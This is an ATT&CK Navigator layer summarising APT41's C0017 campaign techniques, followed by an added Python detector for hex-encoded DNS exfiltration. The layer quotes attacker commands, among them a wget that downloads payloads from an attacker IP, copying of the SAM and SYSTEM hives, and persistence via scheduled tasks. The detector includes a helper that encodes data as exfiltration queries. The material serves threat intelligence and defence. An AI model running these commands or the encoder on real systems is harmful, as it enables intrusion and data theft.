{
  "description": "Enterprise techniques used by C0017, ATT&CK campaign C0017 (v1.0)",
  "name": "C0017 (C0017)",
  "domain": "enterprise-attack",
  "versions": {"layer": "4.5", "attack": "19", "navigator": "5.3.2"},
  "techniques": [
    {"techniqueID": "T1134", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used a ConfuserEx-obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\\SYSTEM` privilege escalation.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1071", "showSubtechniques": true},
    {"techniqueID": "T1071.001", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1560", "showSubtechniques": true},
    {"techniqueID": "T1560.003", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) hex-encoded PII data prior to exfiltration.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1059", "showSubtechniques": true},
    {"techniqueID": "T1059.003", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `cmd.exe` to execute reconnaissance commands.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1059.007", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) deployed JScript web shells on compromised systems.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1005", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) collected information related to compromised machines as well as Personally Identifiable Information (PII) from victim networks.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1001", "showSubtechniques": true},
    {"techniqueID": "T1001.003", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1074", "showSubtechniques": true},
    {"techniqueID": "T1074.001", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) copied the local `SAM` and `SYSTEM` Registry hives to a staging directory.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1140", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the DUSTPAN loader to decrypt embedded payloads.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1048", "showSubtechniques": true},
    {"techniqueID": "T1048.003", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) exfiltrated victim data via DNS lookups by encoding it and prepending it as subdomains to an attacker-controlled domain.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1041", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used its Cloudflare-proxied C2 channels for data exfiltration.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1567", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used Cloudflare services for data exfiltration.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1190", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities, to gain initial access.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1574", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1105", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) downloaded malicious payloads onto compromised systems.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1680", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) issued `ping -n 1 ((cmd /c dir c:\\|findstr Number).split()[-1]+` commands to find the volume serial number of compromised systems.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1036", "showSubtechniques": true},
    {"techniqueID": "T1036.004", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `SCHTASKS /Change` to modify legitimate scheduled tasks to run malicious code.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1036.005", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used file names beginning with USERS, SYSUSER, and SYSLOG for [DEADEYE](https://attack.mitre.org/software/S1052), and changed [KEYPLUG](https://attack.mitre.org/software/S1051) file extensions from .vmp to .upx, likely to avoid hunting detections.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1027", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) broke malicious binaries, including [DEADEYE](https://attack.mitre.org/software/S1052) and [KEYPLUG](https://attack.mitre.org/software/S1051), into multiple sections on disk to evade detection.(Citation: Mandiant APT41)", "score": 1, "showSubtechniques": true},
    {"techniqueID": "T1027.002", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used VMProtect to slow the reverse engineering of malicious binaries.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1588", "showSubtechniques": true},
    {"techniqueID": "T1588.002", "comment": "For [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1003", "showSubtechniques": true},
    {"techniqueID": "T1003.002", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) copied the `SAM` and `SYSTEM` Registry hives for credential harvesting.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1090", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the Cloudflare CDN to proxy C2 traffic.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1053", "showSubtechniques": true},
    {"techniqueID": "T1053.005", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor`, `\\Microsoft\\Windows\\Ras\\ManagerMobility`, `\\Microsoft\\Windows\\WDI\\SrvSetupResults`, and `\\Microsoft\\Windows\\WDI\\USOShared`.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1505", "showSubtechniques": true},
    {"techniqueID": "T1505.003", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) deployed JScript web shells through the creation of malicious ViewState objects.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1016", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `cmd.exe /c ping %userdomain%` for discovery.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1033", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `whoami` to gather information from victim machines.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1102", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used Cloudflare services for C2 communications.(Citation: Mandiant APT41)", "score": 1, "showSubtechniques": true},
    {"techniqueID": "T1102.001", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used dead drop resolvers on two separate tech community forums for their [KEYPLUG](https://attack.mitre.org/software/S1051) Windows-version backdoor; notably, [APT41](https://attack.mitre.org/groups/G0096) updated the community forum posts frequently with new dead drop resolvers during the campaign.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}
  ],
  "gradient": {"colors": ["#ffffff", "#66b1ff"], "minValue": 0, "maxValue": 1},
  "legendItems": [{"label": "used by C0017", "color": "#66b1ff"}]
}
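Worked detection example for the T1560.003 and T1048.003 entries above (hex-encoded data carried out as subdomain labels of an attacker-controlled domain). This is an editor-added example, not part of the ATT&CK layer or the Mandiant reporting: the log line format, the domain `telemetry-sync.example`, the PII record and the threshold constants are all constructed for illustration. The script parses DNS query logs, groups queries that carry long hex-only labels by registrable domain, flags domains that receive a stream of such queries, and reassembles the decoded payload so an analyst can see what left the network.

```python
"""Flag hex-encoded DNS subdomain exfiltration and reassemble the payload.

Editor-added example; nothing here is APT41 tooling or Mandiant's detection.
Log format, domains, record contents and thresholds are constructed.
"""
import re
from collections import defaultdict

# Constructed log format for this example (not a real product's format):
# <timestamp> src=<ip> qname=<query name> qtype=<A|TXT|...>
LOG_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) qname=(?P<qname>\S+) qtype=(?P<qtype>\S+)$")
HEX_LABEL = re.compile(r"^[0-9a-f]+$")

MIN_HEX_LABEL_LEN = 16      # hex-only labels this long are rare in legitimate names
MIN_QUERIES_PER_DOMAIN = 3  # one odd query is noise; a stream to one domain is a channel


def parse_log_line(line):
    """Return the fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def split_name(qname):
    """Return (subdomain labels, registrable domain).

    Assumption for this example: the registrable domain is the last two
    labels. A production detector would consult a public-suffix list.
    """
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-2], ".".join(labels[-2:])


def hex_labels(labels):
    """Labels that are long, even-length and hex-only (decodable as bytes)."""
    return [l for l in labels
            if len(l) >= MIN_HEX_LABEL_LEN and len(l) % 2 == 0 and HEX_LABEL.match(l)]


def detect_dns_exfil(lines):
    """Map registrable domain -> {queries, sources, payload} for domains that
    received MIN_QUERIES_PER_DOMAIN or more hex-carrying queries.

    Payload is rebuilt in order of appearance; real channels often add a
    sequence label because resolvers can reorder queries (not handled here).
    """
    per_domain = defaultdict(lambda: {"queries": 0, "sources": set(), "hex": []})
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        sub, dom = split_name(rec["qname"])
        hx = hex_labels(sub)
        if not hx:
            continue
        d = per_domain[dom]
        d["queries"] += 1
        d["sources"].add(rec["src"])
        d["hex"].extend(hx)
    findings = {}
    for dom, d in per_domain.items():
        if d["queries"] < MIN_QUERIES_PER_DOMAIN:
            continue
        findings[dom] = {"queries": d["queries"],
                         "sources": sorted(d["sources"]),
                         "payload": bytes.fromhex("".join(d["hex"]))}
    return findings


def encode_for_exfil(data, domain, chunk=24):
    """Hex-encode data and prepend it as one label per query (the shape the
    layer describes). Used only to build the constructed sample log below."""
    hx = data.hex()
    return [f"{hx[i:i + chunk]}.{domain}" for i in range(0, len(hx), chunk)]


# Constructed sample data: a fabricated PII record and a made-up domain.
SAMPLE_PII = b"name=Jane Example;dob=1970-01-01;id=000-00-0000"
EXFIL_DOMAIN = "telemetry-sync.example"
SAMPLE_LOG = (
    ["2021-05-11T10:02:30Z src=10.0.0.5 qname=www.example.com qtype=A",
     "2021-05-11T10:02:31Z src=10.0.0.5 qname=a1b2c3.cdn.example.net qtype=A",
     # a single CDN content hash: long hex label, but below the query threshold
     "2021-05-11T10:02:32Z src=10.0.0.7 qname=0123456789abcdef0123456789abcdef.static.example.org qtype=A"]
    + [f"2021-05-11T10:02:3{i + 3}Z src=10.0.0.5 qname={q} qtype=A"
       for i, q in enumerate(encode_for_exfil(SAMPLE_PII, EXFIL_DOMAIN))]
    + ["2021-05-11T10:02:40Z src=10.0.0.7 qname=update.microsoft.com qtype=A"]
)

if __name__ == "__main__":
    for dom, f in detect_dns_exfil(SAMPLE_LOG).items():
        print(f"{dom}: {f['queries']} queries from {f['sources']}, "
              f"{len(f['payload'])} bytes recovered: {f['payload']!r}")
```

The two-label registrable-domain shortcut and the fixed thresholds are the parts to replace before running this over real resolver logs; the grouping-by-domain logic and the decode step carry over unchanged.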